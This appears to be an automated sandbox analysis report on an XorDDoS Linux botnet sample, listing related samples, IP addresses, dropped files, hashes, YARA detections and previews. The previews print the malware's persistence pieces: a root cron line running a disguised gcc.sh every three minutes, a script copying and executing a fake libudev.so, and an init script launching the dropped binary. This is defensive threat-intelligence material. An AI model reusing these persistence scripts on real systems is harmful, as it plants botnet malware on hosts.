                • www.piergitarshoes.com/rs5b/?9IVmWTX=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRyqSPW6kRpf0Q/Lw==&ZGE=ASownF6Ao
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ppp.gggatat456.comDi1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                • 79.137.1.133
                xor1.oGet hashmaliciousXorDDoSBrowse
                • 176.31.91.137
                0Xorddos.oGet hashmaliciousXorDDoSBrowse
                • 54.36.145.106
                XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                • 54.36.15.99
                CD2uXlYGfaGet hashmaliciousXorDDoSBrowse
                • 51.68.183.111
                7ZDbt9EUgmGet hashmaliciousXorDDoSBrowse
                • 51.89.70.85
                ygljglkjgfg0Get hashmaliciousXorDDoSBrowse
                • 51.89.52.13
                2wyzX8yBdRGet hashmaliciousBrowse
                • 51.38.200.187
                aa.hostasa.org23Get hashmaliciousXorDDoSBrowse
                • 99.83.154.118
                XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                • 99.83.154.118
                EgrT0zBhDaGet hashmaliciousXorDDoSBrowse
                • 99.83.154.118
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                BODIS-NJUSSecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.223
                nsg5uov8KS.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.223
                http://lkasyu.xyzGet hashmaliciousUnknownBrowse
                • 199.59.242.153
                MDE_File_Sample_cd2983840fe8c8adbc070cdb4a478be93cf7989a.zipGet hashmaliciousUnknownBrowse
                • 199.59.243.223
                MDE_File_Sample_cd2983840fe8c8adbc070cdb4a478be93cf7989a.zipGet hashmaliciousUnknownBrowse
                • 199.59.243.223
                led_cmds.exeGet hashmaliciousUnknownBrowse
                • 199.59.243.223
                system3_.exeGet hashmaliciousUnknownBrowse
                • 199.59.243.223
                modules.exeGet hashmaliciousUnknownBrowse
                • 199.59.243.223
                file.exeGet hashmaliciousFormBook, PlayBrowse
                • 199.59.243.223
                Quotation.exeGet hashmaliciousFormBook, PlayBrowse
                • 199.59.243.223
                rBillOfQuantity.exeGet hashmaliciousFormBook, PlayBrowse
                • 199.59.243.223
                ORDER_NOTIFICATION_pdf.exeGet hashmaliciousFormBook, PlayBrowse
                • 199.59.243.223
                Specifications.exeGet hashmaliciousFormBook, PlayBrowse
                • 199.59.243.223
                NiNjector.exeGet hashmaliciousLuca Stealer, Rusty Stealer, XmrigBrowse
                • 199.59.243.223
                Invoice.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.223
                Scientize.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 199.59.243.223
                Dissensers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 199.59.243.223
                32AC0624A534A2C40FB8EBA41E80BB1D31B99CD118D42.exeGet hashmaliciousFFDroider, ManusCrypt, Nitol, PrivateLoader, SmokeLoader, SocelarsBrowse
                • 199.59.243.223
                XBAo84Asbf.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.223
                E461562A06F4C2CEA8CC91D9FC6FD75F393B79030D646.exeGet hashmaliciousManusCrypt, Nitol, SmokeLoader, VidarBrowse
                • 199.59.243.223
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                /etc/cron.hourly/gcc.shDi1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                  fuck.elfGet hashmaliciousXorDDoSBrowse
                    dkuidbsedpGet hashmaliciousXorDDoSBrowse
                      libudev.soGet hashmaliciousXorDDoSBrowse
                        23.virGet hashmaliciousXorDDoSBrowse
                          23.virGet hashmaliciousXorDDoSBrowse
                            xor1.oGet hashmaliciousXorDDoSBrowse
                              CCCxor.oGet hashmaliciousXorDDoSBrowse
                                2BAFxor.oGet hashmaliciousXorDDoSBrowse
                                  task2.binGet hashmaliciousXorDDoSBrowse
                                    task2.binGet hashmaliciousXorDDoSBrowse
                                      task2.binGet hashmaliciousXorDDoSBrowse
                                        0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                          x.oGet hashmaliciousXorDDoSBrowse
                                            23Get hashmaliciousXorDDoSBrowse
                                              23Get hashmaliciousXorDDoSBrowse
                                                XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                                                  EgrT0zBhDaGet hashmaliciousXorDDoSBrowse
                                                    4ljhdTTyiAGet hashmaliciousXorDDoSBrowse
                                                      7nJAEBDitlGet hashmaliciousXorDDoSBrowse
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:POSIX shell script, ASCII text executable
                                                        Category:dropped
                                                        Size (bytes):228
                                                        Entropy (8bit):4.807897441464882
                                                        Encrypted:false
                                                        SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                        MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                        SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                        SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                        SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 28%
                                                        Joe Sandbox View:
                                                        • Filename: Di1p3oLnDb.elf, Detection: malicious, Browse
                                                        • Filename: fuck.elf, Detection: malicious, Browse
                                                        • Filename: dkuidbsedp, Detection: malicious, Browse
                                                        • Filename: libudev.so, Detection: malicious, Browse
                                                        • Filename: 23.vir, Detection: malicious, Browse
                                                        • Filename: 23.vir, Detection: malicious, Browse
                                                        • Filename: xor1.o, Detection: malicious, Browse
                                                        • Filename: CCCxor.o, Detection: malicious, Browse
                                                        • Filename: 2BAFxor.o, Detection: malicious, Browse
                                                        • Filename: task2.bin, Detection: malicious, Browse
                                                        • Filename: task2.bin, Detection: malicious, Browse
                                                        • Filename: task2.bin, Detection: malicious, Browse
                                                        • Filename: 0Xorddos.o, Detection: malicious, Browse
                                                        • Filename: x.o, Detection: malicious, Browse
                                                        • Filename: 23, Detection: malicious, Browse
                                                        • Filename: 23, Detection: malicious, Browse
                                                        • Filename: XZFWLZVF1Z, Detection: malicious, Browse
                                                        • Filename: EgrT0zBhDa, Detection: malicious, Browse
                                                        • Filename: 4ljhdTTyiA, Detection: malicious, Browse
                                                        • Filename: 7nJAEBDitl, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                        Process:/bin/dash
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):3.8484226636198593
                                                        Encrypted:false
                                                        SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                        MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                        SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                        SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                        SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                        Process:/usr/lib/insserv/insserv
                                                        File Type:ASCII text, with very long lines (417)
                                                        Category:dropped
                                                        Size (bytes):1380
                                                        Entropy (8bit):4.6286085863457025
                                                        Encrypted:false
                                                        SSDEEP:24:KcR684NIwOkJVARL9Eg3U3PX2xRmbUtOeAyh1ZFDSYpY3dOUwZlY:VR6843OkjARLq0U3PX2xYwtOQh1vDTp8
                                                        MD5:5B62F52693F19BAD0D1373AB955F17B8
                                                        SHA1:3865ED303BD83951D0D69D87A6290F120A937C2E
                                                        SHA-256:9026F82085CF03BE408767439E4FD595F266FE6F11ECC4A3AF7F0555ED358196
                                                        SHA-512:E0015AA580EAAFFF64D59F666FDC91280AAC50C10D5189A13B376E3C9DC71A0FE019D7EE05351F1136F65F5F1CAE6C58D781CBA2E073D57E323629BF5137BE25
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh.INTERACTIVE = console-setup udev keyboard-setup cryptdisks cryptdisks-early checkroot.sh checkfs.sh.udev: mountkernfs.sh.keyboard-setup: mountkernfs.sh udev.mountdevsubfs.sh: mountkernfs.sh udev.brltty: mountkernfs.sh udev.procps: mountkernfs.sh udev.qemu-kvm: mountkernfs.sh udev.cryptdisks: checkroot.sh cryptdisks-early udev lvm2.cryptdisks-early: checkroot.sh udev.hwclock.sh: mountdevsubfs.sh.open-iscsi: networking iscsid.networking: resolvconf mountkernfs.sh urandom procps.iscsid: networking.checkroot.sh: hwclock.sh mountdevsubfs.sh hostname.sh keyboard-setup.lvm2: cryptdi
                                                        Process:/usr/lib/insserv/insserv
                                                        File Type:ASCII text, with very long lines (317)
                                                        Category:dropped
                                                        Size (bytes):1699
                                                        Entropy (8bit):4.655185645871376
                                                        Encrypted:false
                                                        SSDEEP:48:ZuINySAzo1kW27ZGme/9/n2UG+/9/n2UGo/9/n2UG8h/9/n2UGM:JWo1n27keU/eUbeUfeUF
                                                        MD5:DC4067DA8299345F3EA8B6A7C7BE050A
                                                        SHA1:3C07717E87B0CA551251A5679B49849835FB5BA4
                                                        SHA-256:288447265D681276F37FB61857049204F0AA8C96A0E5026E2EC39C2501782AF0
                                                        SHA-512:8D6FBDAD10DB64EA5E5E396B1E20943800810C7F99341BFDFA87AA588239B01A6EDA2E86EC62A11F5A8F58F14740CB05A287BA24C55CA83CA186851A6AC8CA38
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:TARGETS = rsyslog unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs iJl2Sb6qRa killprocs binfmt-support apport mdadm dbus speech-dispatcher hddtemp kerneloops irqbalance single whoopsie rsync ssh acpid lightdm bluetooth avahi-daemon cups-browsed saned plymouth grub-common ondemand rc.local.INTERACTIVE =.mdadm: rsyslog.dbus: rsyslog.speech-dispatcher: rsyslog.hddtemp: rsyslog.kerneloops: rsyslog.irqbalance: rsyslog.single: killprocs iJl2Sb6qRa.whoopsie: rsyslog.rsync: rsyslog.ssh: rsyslog.acpid: rsyslog.lightdm: dbus acpid.bluetooth: rsyslog dbus.avahi-daemon: dbus rsyslog.cups-browsed: rsyslog.saned: rsyslog dbus.plymouth: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uuidd dbus speech-dispatcher lxd hddtemp kerneloops lightdm bluetooth irqbalance lvm2-lvmpolld avahi-daemon lxcfs iJl2Sb6qRa saned whoopsie rsync ssh acpid binfmt-support apport.grub-common: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uui
                                                        Process:/usr/lib/insserv/insserv
                                                        File Type:ASCII text, with very long lines (425)
                                                        Category:dropped
                                                        Size (bytes):1690
                                                        Entropy (8bit):4.52194295219339
                                                        Encrypted:false
                                                        SSDEEP:48:3Yu8rBj1G4GJ/suwT2UKGhuw2zOsuwK2UPOiNQh/4uwHFn2U5wT:M1iUJeZU1cU0
                                                        MD5:7897338A208ABF2E5C95E7994A24F8C8
                                                        SHA1:185E660978A050BD66B62C6AF44695251A373390
                                                        SHA-256:7143B8292EB1C2476411ECA94A4A67E5A166C9FB916724B3458247D1C0E1F5CB
                                                        SHA-512:F322DB116C7DE93E68D9709B8E2CE8163BC1E0BEB264D5D178815DB839FFB3E88AF4C17B4095BFB60A579B103CE48D67B1A257CA3394FCFD46FDA97A473C2632
                                                        Malicious:true
                                                        Preview:TARGETS = atd network-manager cups anacron cron unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs mdadm resolvconf speech-dispatcher hddtemp alsa-utils kerneloops irqbalance ufw whoopsie lightdm bluetooth cups-browsed saned plymouth open-iscsi urandom avahi-daemon iscsid sendsigs rsyslog umountnfs.sh hwclock.sh networking umountfs cryptdisks cryptdisks-early umountroot mdadm-waitidle halt reboot.avahi-daemon: cups-browsed saned.iscsid: open-iscsi.sendsigs: atd mdadm open-iscsi unattended-upgrades open-vm-tools cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp iscsid alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.rsyslog: atd mdadm sendsigs cups-browsed network-manager speech-dispatcher hddtemp kerneloops bluetooth irqbalance avahi-daemon cups saned whoopsie.umountnfs.sh: atd unattended-upgrades open-vm-tools rsyslog cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp sendsigs alsa-utils kern
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:POSIX shell script, ASCII text executable
                                                        Category:dropped
                                                        Size (bytes):315
                                                        Entropy (8bit):5.2791191373405315
                                                        Encrypted:false
                                                        SSDEEP:6:hUtoFdU9ybnsKheJHRNSGBE21YJvmNeMwhzn11DzRIhZ3a6MzEZ3q4:68bmHnjBEMO1LXzuSzA
                                                        MD5:7CA3BBEA566676A6243E4CCF8CCE49E6
                                                        SHA1:A8916AC71E437641E3EA40603F072C5E5EC2CB9A
                                                        SHA-256:E07EA6CB70D1B389CD71C945E0DF98BC83A20E69CBF98016182691E271208F4F
                                                        SHA-512:321AF3DD88DA9C47FD004D733A7FA3FA057F3E0AD8531A8B80785A83AD46382EBAA12C6F0DF4DF38BEAD4884D0363295E716E5DE26319786773D54A98E26C755
                                                        Malicious:true
                                                        Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: iJl2Sb6qRa.### BEGIN INIT INFO.# Provides:..iJl2Sb6qRa.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.iJl2Sb6qRa.### END INIT INFO.case $1 in.start)../tmp/iJl2Sb6qRa..;;.stop)..;;.*)../tmp/iJl2Sb6qRa..;;.esac.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548638
                                                        Entropy (8bit):6.197537018397919
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
                                                        MD5:58881CDFFFCED4E9013EE3FFE4FDC941
                                                        SHA1:425C413C1AB4E1891D85334BDD05CA279CEEA127
                                                        SHA-256:8A1FECA84FE6D3D011C183A32C1F48B1EDB6C98F2D411F0E83038659A3E274C0
                                                        SHA-512:F4EF3AF2332236C07D660A8133D8F345FD7362C2F5AC1A394EF09EC351923902C01481C09B27BCA30273B8ECCA896047A7B69466F90E65A0DD455C2BC34D644D
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /lib/libudev.so, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /lib/libudev.so, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /lib/libudev.so, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /lib/libudev.so, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):32
                                                        Entropy (8bit):4.093139062229566
                                                        Encrypted:false
                                                        SSDEEP:3:FLUPAQxTXBSmB:FgPA5e
                                                        MD5:950A657EE9AE33B4E92C9B673E17EC48
                                                        SHA1:58F85CD5038A63A7E3F8E8E8B15C05194329B216
                                                        SHA-256:109714B1E9C0CC32DDF637CF88EAAA7468EB60C0BB21EAFD0E122D1D4CFB900A
                                                        SHA-512:4414ADF477279CE75CD2BBE89612CF70A1C543E97FEED2922AF6F67DA37E62F1492CDB4E493526181982ED56E48159C1739D80976D15A5B76E2EB2DF96AAA1FF
                                                        Malicious:false
                                                        Preview:wxonqlgszefidbvrcsmgiiobjjsjodcn
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197600610549569
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojA:/fUywKQ7Fb1pNL/p52fjQn36EuA
                                                        MD5:C71C4DEEF5F37DFDBF1CA7D11B856B4E
                                                        SHA1:811AB14EBFC7A6B2B8F5E49F08802FA54BE71D15
                                                        SHA-256:6451A4536BD956C5C26FD0335DE16FE83FF0EAD08A1075EBA882246B42991060
                                                        SHA-512:3DA4D2FA0F765707658E5DDEC693715C20D4814714B9A12184D8BA76CE18738AED87F50F791BF7CC3FFE57F6E4FA86E2F6DF34697B5A21F439339BE531B7BCAC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/chdmwyeiia, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/chdmwyeiia, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/chdmwyeiia, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/chdmwyeiia, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.1975770166096025
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojj:/fUywKQ7Fb1pNL/p52fjQn36Euj
                                                        MD5:90CAF41492792C802131AF2BAA7A0BD1
                                                        SHA1:3AF2974FD5FA09CAA13BE7BE0A22FC57A5805445
                                                        SHA-256:730AD28B7400408D7DA579973876B32CEE4D19B163E3BF374EE6DF46CA50D0EF
                                                        SHA-512:68F91FB28AA1E8F7DE5041860253CA965F4A15539A6E1C55764072DE36AE7025159C5026573696FCB4DCBEABDFD88FA9F78C88FBDFEA0050ED7E4333645F4F4F
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cjfywultqo, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cjfywultqo, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/cjfywultqo, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/cjfywultqo, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.1975897440170415
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojv:/fUywKQ7Fb1pNL/p52fjQn36Euv
                                                        MD5:9CA1940212FEE4AA01A0D75859BE67AD
                                                        SHA1:A75E13B37DD17228C3550086E22653C1F05EE800
                                                        SHA-256:B4C0AFC9E01C25EE9005C7FB7BB8C97CD976793413D9F95B82CD5971DC045D9B
                                                        SHA-512:BE6728DBFABC68CB0AD589775C108907432B4B97F752BA39EEB195C8D110258C1E7908E72C9BD687155228E076CB24A7E53BFE4D9E050A97AAEF999F9379D7DE
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ckxgqrmzxa, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ckxgqrmzxa, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ckxgqrmzxa, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ckxgqrmzxa, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197586606471035
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojR:/fUywKQ7Fb1pNL/p52fjQn36EuR
                                                        MD5:28855A67A8446C5A6D01B3B3BF0B4B52
                                                        SHA1:FDAA77D6A3AAB07693CA37B937F49C952295F8E7
                                                        SHA-256:541BD90859A65C5DD29C78275B6ED4811B53AC68214C9B75C487D889CE81B747
                                                        SHA-512:446285763F404AB64CF2D2E0A244CDB59F80487407043682B13A7FEE38E1778098A2CC9D9996A549681BD5C55096EDEDA8826436F69F1A3F349D35FD644E0EC4
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dezqblvxuy, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dezqblvxuy, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dezqblvxuy, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dezqblvxuy, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 548576
                                                        Category:dropped
                                                        Size (bytes):425984
                                                        Entropy (8bit):6.323259292948688
                                                        Encrypted:false
                                                        SSDEEP:6144:axnm9lfABacn+mKwrXW52+ipNTJVP3nWydo4tdZ9XpCz16MwYPFM5FgjTcxpQyV3:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz3
                                                        MD5:CE32DEB87690503CF1F8B0E1972D06BD
                                                        SHA1:0D4FAF5482F785CE6BC5A32840FFE7EE6209F7D4
                                                        SHA-256:D234EFEB4883204EA27951106629C10EE7177D6B723C8EEA4B866DB09BDF97A2
                                                        SHA-512:DC86F39D21AFF54BB8A6EDACD3C2CDB7E4E318A4753D05AD3B82999A8F8BB93DE80064D34432517EAAAD1EEBEC8ED29632C556F5533B7E309528E0A19E7650FC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/emnaztxelb, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197580352861844
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojy:/fUywKQ7Fb1pNL/p52fjQn36Euy
                                                        MD5:7421C1F0ECE93B4321A3809440512935
                                                        SHA1:74A88F0F873AC61FF39E2C687C1143CC4B56DF73
